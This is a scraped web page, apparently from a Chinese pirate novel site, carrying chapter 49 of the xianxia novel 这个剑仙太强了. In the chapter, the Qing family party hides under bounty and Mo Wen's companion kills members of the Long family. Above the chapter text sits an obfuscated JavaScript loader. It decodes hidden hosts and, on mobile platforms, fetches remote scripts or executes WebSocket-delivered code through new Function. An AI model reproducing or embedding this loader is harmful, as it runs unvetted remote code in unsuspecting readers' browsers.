笔趣阁

字:
关灯 护眼
笔趣阁 > 这个剑仙太强了 > 第49章
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第49章

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
西部最强,太清城。
  
  藏生谷,便在这太清城当中。
  
  太清城中,属两族,一宗,一山最为强大。
  
  基本与东部四大家族实力不相上下,底蕴雄厚。
  
  卿月欢与四王五人,如今便在这太清城中。
  
  相比起莫问过的悠哉生活,这段时间,五人的日子着实不太好过,极为狼狈。
  
  来时,一切都很顺利,
  
  可中间却出现了一些意想不到的变故,那就是卿家派出的所有符师,突然集体叛变了!
  
  他们,不但将封印的消息,卖给了太清城内的各大势力,
  
  更是将他们五人的行踪,也公之于众了!
  
  按说,前者才是大事,后者不痛不痒,即使他们的行踪暴露了又如何呢?
  
  放在以前,确实,
  
  可自从段家颁布了悬赏令后,五人就变成了一块块大肥肉!
  
  卿月欢。
  
  被悬赏整整一千万灵石,简直就是行走的宝库!
  
  至于四王,每人也有高达五百万的赏金,
  
  这五人加起来,一共将近三千万!
  
  这样的数字,足以让任何人为之疯狂,又有谁人不心动?
  
  只不过,还有更疯狂的!
  
  相比起来,卿家这五人都是活捉,绝不能伤及性命。
  
  唯独第六人,也是今早刚刚颁布的悬赏令,标注着一行清晰的大字,提头领赏!
  
  ‘李三,悬赏灵石,五千万!!’
  
  这下,整个西部都为之轰动了!
  
  五千万!
  
  这可是一笔难以想象、难以估量的数字!
  
  一下子,整个西部为之沸腾,所有人都动员了起来,踏上找寻李三的发财路!
  
  这下,就连一些闭死关的老家伙们,都纷纷出关,开始狩猎,情况十分严峻。
  
  现在,在太清城中,任何姓李之人,都不敢说自己是姓李了。
  
  因为这样,会让别人怀疑他们与李三有所关系,会遭受牵连,
  
  这不,早早就有姓李者被人追杀,比窦娥还冤
  
  ……
  
  仙易居,太清城中最好的客栈,因为客房爆满,所以卿月欢四王五人,只能挤在一个房间,一个个精神不振。
  
  四王中,高大的卿古长郁闷道:“这样易容躲着始终不是办法,封印不日便会散去,我们要尽快行动起来!”
  
  卿鸿清容颜清冷,淡声道:“家里情况那边怎么样了?”
  
  “非常糟糕……“”卿古长一脸凝重。“就在三天前,东西部的传送阵,不知为何突然关闭了,
  
  换言之,现在东部与西部,已经彻底隔绝了,我们的消息传不出去,家里的消息也传不进来,何况……”
  
  说到这,卿古长不禁苦涩了起来。“何况,没有了传送阵,就算得到消息,又有何用,人也根本赶不过来……”
  
  卿鸿清横眉。“这段家,真该死!!”
  
  妩媚娇嫩的卿瑶瑶掩口娇笑。“咯咯咯,这也侧面说明了段家的强大,就连传送阵的开关都可以控制。”
  
  卿鸿清沉默。“哼,还不是因为我卿家有个好姑爷,都是因为他,害得我们这么惨。”
  
  卿古长摇头道:“嘿,这我就得说句公道话了,是我卿家符师叛变在先,段家,只不过是火上浇油罢了。”
  
  “啧啧,你也太天真了。”卿鸿清不屑道:“我卿家符师好端端的,怎会叛变,就算叛变,又为何在这个特殊的节骨眼上?”
  
  “这……”卿古长瞪大了眼。“你的意思是说,这件事也与段家有关了?”
  
  “这还用说吗?这不是明显的吗?”
  
  卿鸿清侧过身去。“月欢,不是我说你,结缘这种事,讲究个门当户对,若是这李三家事与我卿家一般显赫,底蕴雄厚,我们两家联合起来,又何惧他段家,早就称霸整个东洲了。”
  
  “是啊,月欢。”就连卿古长都说道:“这天下很大,放在天墉城,他确实是个天才,可放在整个东洲,他未必就是啊……”
  
  所有人你一言我一语,苦口婆心。
  
  但卿月欢本人却一言也不发,她才不管什么门当户对,更不在乎目下出现的变故,
  
  她只在乎公子的安危!
  
  她这些天,几乎是每过一段时间,便会拿出天机试图联系公子。
  
  眼下,又到了联系的时候,可依然,没有任何结果。。
  
  “我说月欢,你这又是何必呢?”
  
  卿月欢兴许是听烦了,起身就走,撂下话来。“你们想办法回天墉城吧,不用管我。”
  
  卿古长赶忙起身拦住了她。“不是,月欢,这是何意?”
  
  “没什么意思。”卿月欢摇头道:“我只是不想连累大家罢了,我要去找公子,如果找不到,我就不回去了。”
  
  她这话,让人很是无语……
  
  卿瑶瑶立刻从床上跳下,轻轻的搂着她的玉臂,摇摇晃晃。“我说月欢妹妹,这李三到底强在什么地方?怎么就把你迷成这样?你以前可不是这样的啊。”
  
  “别瞎想了。”卿鸿清也轻易莲步走来,声若清泉,动人心弦。
  
  “至少我们从阵师那里得知,李三并没有死在空间乱流当中,那也就是说,他现在还活着,而且,就在这西部当中。”
  
  卿月欢一脸倔强。“所以我才要去找他。”
  
  卿鸿清鹏有些无语,坠入爱河的女人怎么这么蠢呢?
  
  “既然李三已在西部当中,就必然听到了他被悬赏,以及你被悬赏的消息,
  
  所以,自然不会轻易露面,说不定已经藏在哪里,非常安全,等待事情的平息!”
  
  这让卿月欢为此沉默,不过很快又道:“你说的都对,不过万一公子没有这样做呢?万一他没有得到消息呢?又万一……”
  
  “快打住……”始终没说话的卿城歌,揉了揉太阳穴,很是头疼。“我只问你一句,你相不相信李三?”
  
  卿月欢本没有任何犹豫。“我当然相信公子,可是……”
  
  “没有可是……”卿城歌苦笑道:“我们都知道你很担心他,可你有没有想过?你出去后,找不找得到他呢?”
  
  “可……”
  
  “毕竟,现在整个城内的所有人,甚至整个西部的所有人,都在找他,他躲还来不及呢,谁也怕是找不到他。”
  
  这让卿月欢终于平静了下来。
  
  确是如此。
  
  看来,也只能在心中默默祈祷,公子一定要平安,一定不要出事。
  
  至于所有人,再也不敢提李三了,再提下去,他们没被活捉,就已经先疯了。
  
  “还是先想想,下一步怎么办吧。”卿城歌作为代表说道:“现在,传送阵关了,就是想回,去也回不去了,不如大干一场,各位说呢?”
  
  众人相视了一眼,眼神逐渐坚定。
  
  “大干一场!”
  
  “那好。”卿城歌说道:“既然这样,我们午时便离开客栈,前往藏生谷。
  
  在这期间,能不动手,尽量不动手,如果非要动手,千万不要用自己熟悉的动作招式,免得被人认出来,切记!”
  
  众人重重点头。
  
  “另外还有一点,也是最重要的,遗迹开启,势必会惊动整个西部,到时,风云集会,强者如海,一个不慎便会粉身碎骨,
  
  所以,有什么丹药,补品的,现在能吃就赶紧吃,能提多少提多少,也好增加一些竞争的资本,增加一些活下去的希望。”
  
  众人肃然点头,立刻行动。
  
  ……
  
  ……
  
  一天后。
  
  太清城,城西。
  
  一头霸气的遮天银象,渐渐落在雄伟的城西门下,一老一少,自象背上踏下,牵象走进了太清城。
  
  熙攘宽广的街巷,人来人往,每每有人与莫问相对时,无不会下意识地多看他好几眼,一个个神色各有不同。
  
  这让他不禁感到好奇。“你说,他们看我,还是看象?”
  
  身旁,剑十三抚须哈哈一笑。“或许都不是,说不定是看学生呢?”
  
  莫问一笑。“倒是我自作多情了。”
  
  二人也是来到一家客栈歇脚,这客栈当中的生意异常火爆,嘈杂无比,
  
  不过,就在莫问与剑十三出现的一刻,整个客栈都突然间安静了下来,
  
  随即,人群哗啦啦地散开,一个个眼中充满了贪婪,但却不敢轻举妄动。
  
  莫问也懒得在意,与剑十三找了个桌子便是坐下。
  
  “小二上菜!”
  
  然而没等到小二,却等到了一只可怕的冷箭!
  
  蕴含着玄阶七段的必杀一击!
  
  快如闪电!
  
  让人心惊肉跳!
  
  不过,还不等接近莫问,身旁的剑十三蓦地抬起右掌,
  
  二指,轻轻一夹!
  
  砰!
  
  利箭骤然停住!
  
  赫然被剑十三稳稳夹在两指之间,失去了所有的威势。
  
  而这一幕,也是让在场所有人眼皮一跳,神情凝重了起来。
  
  这五千万,并不好拿!
  
  剑十三把玩着手中的箭矢,鼻息当中发出一声冷哼,犹如雷霆之音,震地所有人脑海一白!
  
  他懒得理会这些人,转头向着莫问问道:“先生,此人如何处置?”
  
  后者倒了杯茶,喝了一口。“抓来问问,为何杀我?”
  
  “好嘞。”剑十三说完,便是冲出了客栈,
  
  不一会儿的功夫,街上就是传来了一声惨叫,便是提着一个瘦小的云衣少年赶了回来。
  
  在场众人一愣。
  
  这不是龙家的小少爷,龙安宁吗?
  
  眼看被当众提着,少年脸色通红,立刻喝道:“放开我,你知道我是谁吗?”
  
  “我管你是谁!”剑十三说着就要动手,不过却被莫问拦住了,
  
  他看了一眼这瘦小的少年。“把它放开,让他坐下。”
  
  剑十三立刻照办。
  
  龙安宁一愣,立刻是灿然一笑,大马金刀坐下。“哼,你还算识相。”
  
  莫问给他倒了杯茶,笑道:“我很好奇,你我素昧谋面,为何非要杀我?”
  
  龙安宁一愣。“哼,你居然不知道?
  
  嘿嘿,不过也难怪,你要是知道,又怎敢出现在人群当中,早就躲到深山老林去了。”
  
  这倒是让莫问更加好奇了。“那你倒是说说看,究竟是什么麻烦,要我不得不躲到深山老林里去?”
  
  “啧啧。”龙安宁拿起杯子一饮而尽,目光凝重起来。“段家,你应该知道吧?”
  
  下一刻,所有人的脸色都凝重了起来,包括剑十三。
  
  心说先生到底是什么人啊,怎么还和段家扯上关系了……
  
  “段家?”莫问摇头。“并未听说过,很强吗?”
  
  这话一出,所有人都跟着一愣,
  
  只见龙安宁嘲讽地大笑起来。“你真是孤陋寡闻啊,不过,你既然问了,那我就大发慈悲的告诉你吧,
  
  段家,很强很强很强!光是已知的天阶尊者,就有高达八位!
  
  至于地阶强者,更是多如牛毛,随便派出一位,都能杀你全家!”
  
  “八位天阶啊?”莫问呢喃自语。
  
  龙安宁冷笑。“怎么样?是不是怕了?”
  
  莫问没有回答,而是问道:“所以,这段家跟你杀我有什么关系?”
  
  “因为啊……”龙安宁阴恻恻一笑。“因为你的脑袋,价值灵石五千万!!”
  
  话音落下,
  
  无数道目光无不是闪烁着可怕的贪婪,顷刻之间让这里成为了永恒的白昼!
  
  先别管五千万是什么概念,只需知道一点,足以让整整五位天阶尊者,为他们卖命了。。
  
  听得这五千万,就连莫问本人,目光都是突然一亮!
  
  自嘲笑道:“真没想到,我的脑袋,会值这么多钱。”
  
  “啧,你居然还笑得出来?”龙安宁讥笑道:“如果是我,我现在就赶紧跑,跑得越远越好,不过可惜啊,你现在想跑,都来不及了。”
  
  莫问笑了笑,没有在这个问题上再浪费时间。“我很好奇,你目下受制于人,又为何这般嚣张凌人,你难道,不怕死?”
  
  这话一出,不光是龙安宁,就连所有人都忍不住笑出了声。
  
  有老人提醒道:“年轻人,龙家可是这城西的霸主,别说现在这种情况你不敢杀他,他就是当着你的面,杀了你的全家,你照样不敢杀他。”
  
  “这么大的能耐?”莫问眼中一亮。“杀了我全家,我都只能忍着?”
  
  “嘿嘿,那你以为呢?”又有人说道:“龙家可是有十一位地阶强者,龙家老太爷更是身处后期,半只脚七段,放眼城西,所向披靡!”
  
  有青年满是同情地道:“我要是你,我现在就赶紧向龙少求饶,而不是在这里等死。”
  
  “求饶?”莫问愕然。“他险些杀了我,我才是受害者,理应是他向我道歉,甚至求饶,我又为何,要向他求饶?”
  
  众人差点笑出了猪叫。
  
  就连龙安宁也是拍着桌子,笑得合不拢嘴。
  
  “姓李的,你错了。”有人讥笑道:“你,不是受害者,而龙少,才是受害者,你理应,跪下求饶。”
  
  莫问哑然失笑。“杀人的人,居然是受害者?”
  
  砰砰砰——
  
  龙安宁砸着桌子,起身狂傲道:“在这城西,我龙家,便是法!”
  
  所有人,无不点头。
  
  “跪下求饶吧,还等什么呢?”
  
  “嘿嘿,我觉得你就算跪下求饶,也不定能活,毕竟,五千万呢。”
  
  “唉,可惜了,我们是拿不到了,不过见证五千万落地,也是很激动呢。”
  
  “那真是谢谢各位的建议了。”莫问笑了笑。
  
  就在众人以为他要求饶。
  
  龙安宁也是做好了准备姿势,
  
  但是。
  
  他却抬了抬手指。
  
  剑十三心领神会!
  
  抽剑,收剑,头落,一气呵成!
  
  咕噜噜……
  
  龙安宁鲜活的脑袋滚落在了地上,他到死的那一刻,都不相信有人敢杀他……
  
  至于接下来,场面理应没有了声音……
  
  一双双目光有惊愕,有疑惑,有古怪,有同情……
  
  下一刻,场面炸开!
  
  “大祸临头啊,大祸临头了啊。”
  
  “李三是吧?你今天就算是李仙王,也得遭到这,别想走了。”
  
  “年轻人,非要意气用事,等会儿,有你吃苦头的时候!”
  
  对于这些人的话,莫问是一句也没听,也懒得搭理,
  
  倒是身旁的剑十三,实在忍不住道:“管它龙家还是虎家,胆敢对先生出手,必死!!”
  
  说着,冷冷地扫了一眼所有人。“你们也一样,再用那种古怪目光看先生一下,老夫眼珠子都给你们挖出来!!”
  
  “你……”
  
  众人脸色涨红,却是不敢反驳。
  
  哼,等会儿龙家高手来,有你们两个好受的!
  
  所以,众人也是一个都未离开,就等着看好戏。
  
  也是不一会儿,一大堆人马携冲天肃杀之意狂碾而来,恐怖的气息交错开来,霸道席卷在天地的每一个角落,让所有人的识海都在颤动!
  
  所有人见状,连忙散开,一个个皆是幸灾乐祸了起来,
  
  这下,两人彻底完蛋了!
  
  而今,二十余道充满压迫的身影,同一匹匹战火烈马上突然踏下!
  
  十一位地阶强者,赫然在列!
  
  余下的皆是玄阶巅峰高手,
  
  阵容恐怖!
  
  可以说,龙家是倾巢而出,抱着必杀的决心,谁挡谁死!
  
  十一位地阶当中,为首的三人一老二小,
  
  老的,当然是龙家的老太爷。
  
  至于小的,
  
  则是龙安宁的大哥与大姐。
  
  这些人,一走到客栈前,便看到了地上龙安宁鲜活的人头,无不是脸色骤变,双眼血红!
  
  为首的老者,更是身躯颤抖不止,声音极其沙哑撕裂。“谁……干的?”
  
  围观群众,不约而同将目光看向了客栈当中的一老一少,神情逐渐古怪了起来。
  
  下一瞬,所有人就要动手,不过却被老人拦住了,杀气腾腾走来,坐在了莫问与剑十三的对面。
  
  压制着心中恐怖的怒火,沉声问道:“何愁何怨,为何……杀我太孙儿?”
  
  莫问无视了他的愤怒,说道:“他要杀……”
  
  “这里没有小辈说话的份!!”龙在天恐怖的六段巅峰气势,轰然镇压在了莫问单薄的身躯上。
  
  然而,让他惊讶的是,后者并未有任何反应。
  
  莫问不紧不慢地笑道:“他要杀我,我便杀他,这很公平。”
  
  “公平?”老人身后,走来一个红衣少女,轻蔑道:“他,即使杀了你又如何?在这城西,我龙家就是天,天若是怒了,你必须受着,天要是高兴。你也因此享福。”
  
  莫问灿笑。“所以,你想表达什么?”
  
  “怎么?我说的难道还不够清楚?”女子玉手抱胸,冷冷一笑,用极度嘲讽的声音说道:“换句话说……我龙家杀人,天经地义,何须向人解释?”
  
  所有围观者无不是点头。
  
  这话,说的没毛病。
  
  “啧,这可真是霸气啊。。”莫问喝了口茶,说道:“所以,我若是被杀,那就是白死了?”
  
  少女挑了挑眉。“嗯哼,你觉得呢?”
  
  “还和他费什么话呀?”这时,另外那个蓝衣男子走了过来,冷冷地看着莫问。“杀了我龙家的人,今日,你想死都难!”
  
  “看起来,事情没有商量的余地了……”
  
  一老二小,异口同声。“你觉得呢?”
  
  不过,莫问还是说道:“他杀我,我杀他,这很公平,此事,就此作罢,你们意下如何?”
  
  这话一出,所有人,就连在场的围观者,都不禁哄笑了起来。
  
  “哈哈哈……听到了吗?这人在城西讲公平,向龙家讲公平,他脑子秀逗了吗?”
  
  “此人真是从头傻到尾,这样的人,居然能被悬赏五千万,我都怀疑是不是认错人了。”
  
  “小贼,我告诉你吧,这世上没有绝对的公平,只有拳头的大小,如果你的拳头足够大,你就可以制定规则,反之,就老老实实的接受规则,懂了吗?”
  
  “懂了。”莫问笑道:“那也就是说,谁的拳头大,谁就可以为所欲为呗?”
  
  所有人都嗤笑一声,
  
  你这不是在讲废话吗?
  
  “既然这样,那我无话可说。”莫问起身,走到了另一张新的桌子。“那就不要后悔。”
  
  与此同时,剑十三兴奋地大笑了起来,
  
  自从他力量又进一层,还从未动试过强度呢。
  
  “嘎嘎,那就先从小的开始吧,至于老的,当是硬菜,最后再来。”
  
  话落。
  
  轰隆隆隆——
  
  恐怖的八段巅峰气势,轰然自体内席卷开来,天地惊变!
  
  “不好!”
  
  也是在死寂之间,剑十三拿出一把小小的木剑,轻轻一挥,如同割麦一般简单,收走了一男一女的性命。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师